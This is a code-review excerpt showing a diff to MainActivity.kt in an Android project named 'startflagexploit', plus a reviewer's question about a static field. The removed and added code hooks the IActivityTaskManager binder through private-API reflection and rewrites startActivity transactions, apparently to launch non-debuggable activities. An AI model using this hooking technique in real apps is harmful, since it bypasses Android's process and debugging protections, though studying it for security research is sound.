app/src/main/java/org/chickenhook/startflagexploit/MainActivity.kt

```diff
@@ -1,177 +1,67 @@
+                this@MainActivity,
+                arrayOf(Manifest.permission.READ_CONTACTS),
+                1001
             )
-                ?.let {
-                    val creator = it::class.java.getDeclaredMethod(
-                        "createFromParcel",
-                        Parcel::class.java
-                    )
-                    val profilerInfo = creator(data)
-                    _data.writeInt(0) //TODO not supported in hooks :( PRAY!!
-                } ?: run {
-                throw RuntimeException("Unable to read profile Info... Abort")
-            }
         }
-        val hasOptions = data.readInt()
-        if (hasOptions == 0) {
-            _data.writeInt(0)
-        } else {
-            _data.writeInt(1)
-            val options = data.readBundle()
-            _data.writeBundle(options)
-        }
-
-        Logger.log("BinderHook [+] send manipulated startActivity() call")
-        return originalBinder.transact(code, _data, reply, flags)
     }
 
-
-    fun crash(){
-        ServiceHooks.hookActivityTaskManager(object :
-            OnBinderListener() {
-            val DESCRIPTOR = "android.app.IActivityTaskManager"
-
-            override fun transact(
-                originalBinder: IBinder,
-                code: Int,
-                data: Parcel,
-                reply: Parcel?,
-                flags: Int
-            ): Boolean {
-
-                if (code == 1) { // start activity
-                    return startActivityHook(
-                        originalBinder,
-                        code,
-                        data,
-                        reply,
-                        flags,
-                        DESCRIPTOR
-                    )
-                }
-
-                return originalBinder.transact(code, data, reply, flags)
-            }
-        })
-
-        /**
-         * Launch any non debuggable activity.
-         */
-        ActivityCompat.requestPermissions(
-            this@MainActivity,
-            arrayOf(Manifest.permission.READ_CONTACTS),
-            1001
+    @SuppressLint("BlockedPrivateApi", "PrivateApi")
+    @Throws(Exception::class)
+    private fun hook() {
+        // get IActivityTaskManager instance
+        val activityTaskManagerClazz =
+            Class.forName("android.app.ActivityTaskManager")
+        val getServiceMethod =
+            activityTaskManagerClazz.getDeclaredMethod("getService")
+        getServiceMethod.isAccessible = true
+        val iActivityTaskManager = getServiceMethod.invoke(null)
+
+        // get IActivityTaskManagerSingleton in IActivityTaskManager instance
+        val iActivityTaskManagerSingletonField =
+            activityTaskManagerClazz.getDeclaredField("IActivityTaskManagerSingleton")
+        iActivityTaskManagerSingletonField.isAccessible = true
+        val iActivityTaskManagerSingleton =
+            iActivityTaskManagerSingletonField[iActivityTaskManager]
```

Comment:
IActivityTaskManagerSingleton is static so why do we need an instance of "iActivityTaskManager" ?

code: https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/app/ActivityTaskManager.java#146